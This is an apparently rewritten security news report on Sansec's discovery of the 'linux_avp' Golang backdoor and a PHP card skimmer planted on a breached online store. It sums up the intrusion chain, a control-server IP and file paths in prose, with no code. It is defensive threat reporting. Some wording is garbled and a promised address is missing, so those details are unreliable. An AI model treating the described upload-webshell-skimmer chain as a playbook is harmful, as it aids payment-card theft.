Security researchers from the Sansec Threat Research Team discovered a Linux backdoor.On October 8th, the same malware was submitted to Virustotal with the comment test. As of this writing, no other anti-virus vendor identifies this malware. This was only one day after our customer’s store had been successfully breached.
The person who uploaded the malware could be the malware author, who wanted to claim that common anti-virus engines would not detect their creation.
The attackers began with a discovery process in which they enquired the e-store with automated eCommerce attack probes. After about a day and a half, the threat actors discovered and exploited a file upload vulnerability in one of the e-plugins, store’s allowing them to upload a webshell and inject a software skimmer.
The attackers also uploaded a Golang-written Linux backdoor (linux avp) that tries to present as a false ps -off process. The backdoor was discovered to be capable of receiving commands from a server hosted on Alibaba (126.96.36.199). To achieve persistence, the backdoor injects a malicious crontab entry.
Sansec tweeted as a post,
We found a New Goiang malware agent “linux_avp”.
- targets eCommerce sites hidden as “ps-ef” process
- uses PKI
- Alibaba hosted control server
- complied by user “dob”
The backdoor was allegedly created by user “dob” in the project folder “lin avp,” and it was codenamed GREECE by the development team.
The PHP-coded web skimmer was hidden in the /app/design/frontend/ folder as a.JPG image file (app/design/frontend/favicon absolute top[.]jpg). The skimmer obtains a bogus payment form from the address listed below.
Finally Sansec concluded that “The person uploading the malware could very well be the malware author, claiming that common anti-virus engines will not detect their creation.Sansec has updated detection capabilities for our eComscan security monitor, and the malware was discovered on several servers in the United States and the European Union”.